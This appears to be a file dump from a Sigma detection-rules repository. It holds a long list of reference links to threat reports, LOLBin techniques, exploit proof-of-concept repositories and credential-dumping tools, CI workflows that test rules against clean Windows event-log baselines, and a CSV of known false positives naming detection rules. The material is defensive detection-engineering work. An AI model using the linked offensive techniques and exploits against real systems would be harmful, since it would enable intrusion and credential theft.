- https://app.any.run/tasks/ae3c4ded-fd6a-43ed-8215-ba0ba574ad33
- https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/
- https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html
- https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin
- https://www.cybertriage.com/artifact/terminalservices_remoteconnectionmanager_log/
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in
- https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
- https://itm4n.github.io/cdpsvc-dll-hijacking/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324
- https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/
- https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps
- https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
- https://megatools.megous.com/
- https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/
- https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
- https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/
- https://github.com/codewhitesec/SysmonEnte/blob/fe267690fcc799fbda15398243615a30451d9099/screens/1.png
- https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/
- https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code
- https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_22.12.2023.txt
- https://www.safetycli.com/blog/shai-hulud-npm-attack-runs-malicious-github-action
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel
- https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216
- https://trustedsec.com/blog/command-line-underdog-wmic-in-action
- https://github.com/mulwareX/CVE-2025-6218-POC
- https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/
- https://securitylabs.datadoghq.com/cloud-security-atlas/vulnerabilities/iam-user-without-mfa/
- https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
- https://www.fortiguard.com/psirt/FG-IR-24-535
- https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/
- https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging
- https://x.com/JangPr0/status/1932034543026065833
- https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/
- https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs
- https://www.group-ib.com/resources/threat-research/red-curl-2.html
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/
- https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b
- https://www.linkedin.com/posts/mauricefielenbach_livingofftheland-redteam-persistence-activity-7344801774182051843-TE00/
- https://github.com/rtecCyberSec/SpeechRuntimeMove
- https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/306021697/config-firewall-address
- https://x.com/0x534c/status/1944694507787710685
- https://www.loobins.io/binaries/nscurl/
- https://gtfobins.github.io/gtfobins/gcc/#shell
- https://docs.microsoft.com/en-us/powershell/module/appx/add-appxpackage
- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis
- https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/
- https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
- https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html
- https://github.com/HackTricks-wiki/hacktricks/blob/72f20a3fa26775b932bd819f1824c6377802a768/src/windows-hardening/basic-cmd-for-pentesters.md#firewall
- https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set
- https://www.loobins.io/binaries/pbpaste/
- https://news.ycombinator.com/item?id=29504755
- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/delete-bucket.html
- https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/
- https://hopeness.medium.com/master-the-linux-mknod-command-a-comprehensive-guide-1c150a546aa8
- https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
- https://juggernaut-sec.com/capabilities/#cap_setuid
- https://securitylabs.datadoghq.com/articles/shai-hulud-2.0-npm-worm/
- https://www.electronjs.org/docs/latest/tutorial/native-code-and-electron
- http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/
- https://notepad-plus-plus.org/news/v889-released/
- https://github.com/DambergC/SaveFolder/blob/90e945eba80fae85f2d54b4616e05a44ec90c500/Cygate%20Installation%20tool%206.22/Script/OSD/OSDeployment-CredentialGuardDisable.ps1#L50
- https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/
- https://cert.gov.ua/article/6284080
- https://www.splunk.com/en_us/blog/security/threat-update-awfulshred-script-wiper.html
- https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
- https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/
- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
- https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/
- https://www.security.com/threat-intelligence/medusa-ransomware-attacks
- https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/
- https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
- https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/
- https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications
- https://www.virustotal.com/gui/file/29837d0d3202758063185828c8f8d9e0b7b42b365c8941cc926d2d7c7bae2fb3
- https://manual.cs50.io/2/personality
- https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures
- https://en.wikipedia.org/wiki/Right-to-left_override
- https://www.attackiq.com/2023/09/20/emulating-rhysida/
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038
- https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging
- https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy
- https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4
- https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations
- https://github.com/fortra/impacket/blob/ff8c200fd040b04d3b5ff05449646737f836235d/examples/secretsdump.py
- https://www.virustotal.com/gui/file/54d60fd58d7fa3475fa123985bfc1594df26da25c1f5fbc7dfdba15876dd8ac5/behavior
- https://github.com/logangoins/Krueger/tree/main
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf
- https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events
- https://www.geeksforgeeks.org/how-to-kill-processes-on-the-linux-desktop-with-xkill/
- https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-guardduty-detector-is-enabled
- https://github.com/varwara/CVE-2024-35250
- https://linux.die.net/man/8/auditct
- https://www.broadcom.com/support/security-center/protection-bulletin/funksec-ransomware
- https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed
- https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash
- https://portswigger.net/daily-swig/vmware-horizon-under-attack-as-china-based-ransomware-group-targets-log4j-vulnerability
- https://bazaar.abuse.ch/browse/tag/one/
- https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
- https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/
- https://www.nextron-systems.com/2025/07/29/detecting-the-most-popular-mitre-persistence-method-registry-run-keys-startup-folder/
- https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
- https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/
- https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication
- https://github.com/search?q=devcon+disable+VMWVMCIHOSTDEV
- https://www.picussecurity.com/resource/blog/as-rep-roasting-attack-explained-mitre-attack-t1558.004
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins
- https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732
- https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/reagentc-command-line-options?view=windows-11
- https://jgspiers.com/audit-group-policy-changes/
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/114404382/config-vpn-ssl-settings
- https://github.com/arttoolkit/arttoolkit.github.io/blob/16d6230d009e58fd6f773f5317fd4d14c1f26004/_wadcoms/AMSI-Bypass-Jscript_amsienable.md
- https://www.hexacorn.com/blog/2025/06/14/wermgr-exe-boot-offdmpsvc-dll-lolbin/
- https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/
- https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/
- https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior
- https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1124/T1124.md
- https://x.com/0gtweet/status/1564131230941122561
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741
- https://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins
- https://github.com/TwoSevenOneT/WSASS/blob/2c8fd9fa32143e7bc9f066e9511c6f8a57bc64b5/WSASS.cpp#L251
- https://www.man7.org/linux/man-pages/man1/systemctl.1.html
- https://gtfobins.github.io/gtfobins/rsync/#shell
- https://www.trendmicro.com/en_us/research/25/f/water-curse.html
- https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpwritedump
- https://www.youtube.com/watch?v=uSYvHUVU8xY
- https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616
- https://man7.org/linux/man-pages/man1/dmesg.1.html
- https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/
- https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf
- https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf
- https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/
- https://docs.github.com/en/pages/getting-started-with-github-pages/creating-a-github-pages-site
- https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/
- https://apophis133.medium.com/powershell-script-tactical-rmm-installation-45afb639eff3
- https://bazaar.abuse.ch/sample/7bde840c7e8c36dce4c3bac937bcf39f36a6f118001b406bfbbc25451ce44fb4/
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation
- https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials
- https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure
- https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations
- https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity
- https://hawktrace.com/blog/CVE-2025-59287-UNAUTH
- https://docs.python.org/3/library/http.server.html
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr
- https://ptsecurity.com/research/pt-esc-threat-intelligence/striking-panda-attacks-apt31-today
- https://firecompass.com/crushftp-vulnerability-cve-2025-54309-securing-file-transfer-services/
- https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country
- http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/
- https://securelist.com/passiveneuron-campaign-with-apt-implants-and-cobalt-strike/117745/
- https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/
- https://restic.net/
- https://woshub.com/disable-credential-guard-windows/
- https://labs.yarix.com/2025/06/doppelganger-an-advanced-lsass-dumper-with-process-cloning/
- https://www.virustotal.com/gui/file/d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97
- https://tria.ge/241231-j9yatstqbm/behavioral1
- https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install
- https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer
- https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html
- https://cloud.google.com/blog/topics/threat-intelligence/apt41-initiates-global-intrusion-campaign-using-multiple-exploits/
- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown
- https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/start
- https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019
- https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf
- https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
- https://cert.gov.ua/article/6277849
- https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0
- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::SecurityPage_AutoDetect
- https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Amazon%20Web%20Services/Analytic%20Rules/AWS_GuardDutyDisabled.yaml
- https://research.splunk.com/endpoint/395ed5fe-ad13-4366-9405-a228427bdd91/
- https://help.fortinet.com/fsiem/Public_Resource_Access/7_4_0/rules/PH_RULE_AWS_GuardDuty_Detector_Deletion.htm
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1
- https://www.howtogeek.com/137270/50-file-extensions-that-are-potentially-dangerous-on-windows
- https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/
- https://www.getsafety.com/blog-posts/shai-hulud-npm-attack
- https://gist.github.com/travisbgreen/82b68bac499edbe0b17dcbfa0c5c71b7
- https://stackoverflow.com/questions/66011412/how-to-clear-a-event-log-in-powershell-7
- https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html
- https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
- https://www.pcrisk.com/removal-guides/31853-funklocker-funksec-ransomware
- https://www.joesandbox.com/analysis/1467354/0/html
- https://help.fortinet.com/fsiem/Public_Resource_Access/7_2_1/rules/PH_RULE_AWS_Management_Console_Brute_Force_of_Root_User_Identity.htm
- https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently
- https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
- https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44
- https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous
- https://us-cert.cisa.gov/ncas/alerts/aa21-259a
- https://research.splunk.com/endpoint/3742ebfe-64c2-11eb-ae93-0242ac130002
- https://redcanary.com/threat-detection-report/techniques/installer-packages/
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/113121765/config-vpn-ssl-web-portal
- https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-table-transact-sql?view=sql-server-ver16
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
- https://blog.sekoia.io/scattered-spider-laying-new-eggs/
- https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection
- https://www.binarly.io/blog/design-issues-of-modern-edrs-bypassing-etw-based-solutions
- https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48
- https://labs.watchtowr.com/expression-payloads-meet-mayhem-cve-2025-4427-and-cve-2025-4428/?123
- https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1
- https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/
- https://man7.org/linux/man-pages/man8/setcap.8.html
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/
- http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/
- https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/
- https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository
- https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis
- https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration
- https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/
- https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis
- https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample
- https://viz.greynoise.io/tags/hello-world-scraper-botnet?days=30
- https://adsecurity.org/?p=1785
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-using-group-policy
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules
- https://reliaquest.com/blog/threat-spotlight-cve-2025-54309-crushftp-exploit/
- https://app.any.run/tasks/8901e2d5-0c5a-48ba-a8e9-10b5ed7e06f4
- https://huntress.com/blog/esxi-vm-escape-exploit
- https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/
- https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/
- https://docs.datadoghq.com/security/default_rules/719-39f-9cd/
- https://support.kaspersky.com/KES4Linux/12.0.0/en-US/197929.htm
- https://taggart-tech.com/evildeno/
- https://medium.com/@ninnesoturan/detecting-ipv6-dns-takeover-a54a6a88be1f
- https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
- https://app.any.run/tasks/ea944b89-69d8-49c8-ac1f-5c76ad300db2
================================================
FILE: .github/workflows/goodlog-tests.yml
================================================
# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
name: Goodlog Tests
on: [push, pull_request, merge_group, workflow_dispatch]
env:
EVTX_BASELINE_VERSION: v0.8.4
jobs:
check-baseline-win7:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
- name: Download evtx-sigma-checker
run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
- name: Download and extract Windows 7 32-bit baseline
run: |
wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win7-x86.tgz
tar xzf win7-x86.tgz
- name: Check for Sigma matches in baseline
run: |
chmod +x evtx-sigma-checker
./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win7_x86/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
- name: Show findings excluding known FPs
run: |
chmod +x .github/workflows/matchgrep.sh
./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
check-baseline-win10:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
- name: Download evtx-sigma-checker
run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
- name: Download and extract Windows 10 baseline
run: |
wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win10-client.tgz
tar xzf win10-client.tgz
- name: Check for Sigma matches in baseline
run: |
chmod +x evtx-sigma-checker
./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Client/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
- name: Show findings excluding known FPs
run: |
chmod +x .github/workflows/matchgrep.sh
./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
check-baseline-win11:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
- name: Download evtx-sigma-checker
run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
- name: Download and extract Windows 11 baseline
run: |
wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win11-client.tgz
tar xzf win11-client.tgz
- name: Check for Sigma matches in baseline
run: |
chmod +x evtx-sigma-checker
./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Win11/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
- name: Show findings excluding known FPs
run: |
chmod +x .github/workflows/matchgrep.sh
./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
check-baseline-win11-2023:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
- name: Download evtx-sigma-checker
run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
- name: Download and extract Windows 11 baseline
run: |
wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win11-client-2023.tgz
tar xzf win11-client-2023.tgz
- name: Check for Sigma matches in baseline
run: |
chmod +x evtx-sigma-checker
./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Win11_2023/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
- name: Show findings excluding known FPs
run: |
chmod +x .github/workflows/matchgrep.sh
./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
check-baseline-win2022:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
- name: Download evtx-sigma-checker
run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
- name: Download and extract Windows 2022 baseline
run: |
wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-evtx.tgz
tar xzf win2022-evtx.tgz
- name: Check for Sigma matches in baseline
run: |
chmod +x evtx-sigma-checker
./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win2022-evtx/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
- name: Show findings excluding known FPs
run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
check-baseline-win2022-domain-controller:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
- name: Download evtx-sigma-checker
run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
- name: Download and extract Windows 2022 baseline
run: |
wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-ad.tgz
tar xzf win2022-ad.tgz
- name: Check for Sigma matches in baseline
run: |
chmod +x evtx-sigma-checker
./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
- name: Show findings excluding known FPs
run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
check-baseline-win2022-0-20348-azure:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
- name: Download evtx-sigma-checker
run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
- name: Download and extract Windows 2022.0.20348 Azure baseline
run: |
wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz
tar xzf win2022-0-20348-azure.tgz
- name: Check for Sigma matches in baseline
run: |
chmod +x evtx-sigma-checker
./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
- name: Show findings excluding known FPs
run: |
chmod +x .github/workflows/matchgrep.sh
./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
================================================
FILE: .github/workflows/greetings.yml
================================================
name: Greet First-Time Contributors
on:
pull_request:
types:
- opened
issues:
types:
- opened
permissions:
issues: write
pull-requests: write
id-token: write
contents: read
jobs:
greeting:
name: Greet First-Time Contributors
if: github.event_name == 'issues' || (github.event_name == 'pull_request' && github.event.pull_request.head.repo.full_name != github.repository)
runs-on: ubuntu-latest
steps:
- uses: actions/first-interaction@v3
with:
issue_message: |
Welcome :wave:
It looks like this is your first issue on the Sigma rules repository!
The following repository accepts issues related to `false positives` or `rule ideas`.
If you're reporting an issue related to the pySigma library please consider submitting it [here](https://github.com/SigmaHQ/pySigma)
Thanks for taking the time to open this issue, and welcome to the Sigma community! :smiley:
pr_message: |
Welcome :wave:
It looks like this is your first pull request on the Sigma rules repository!
Please make sure to read the [SigmaHQ conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/) to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.
Thanks again, and welcome to the Sigma community! :smiley:
================================================
FILE: .github/workflows/known-FPs.csv
================================================
RuleId;RuleName;MatchString
8e5e38e4-5350-4c0b-895a-e872ce0dd54f;Msiexec Initiated Connection;.*
ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94;Suspicious WSMAN Provider Image Loads;.*
db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;python-3
db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\.exe
96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;.*
1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon
e28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell
8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;(sysmon-intense\.xml|sysmonconfig-trace\.xml)
8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon)
4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_
36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR
73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote
6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\Integration\\Integrator\.exe
00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4 Task: 0
162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\.exe
cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\.49\.150\.241
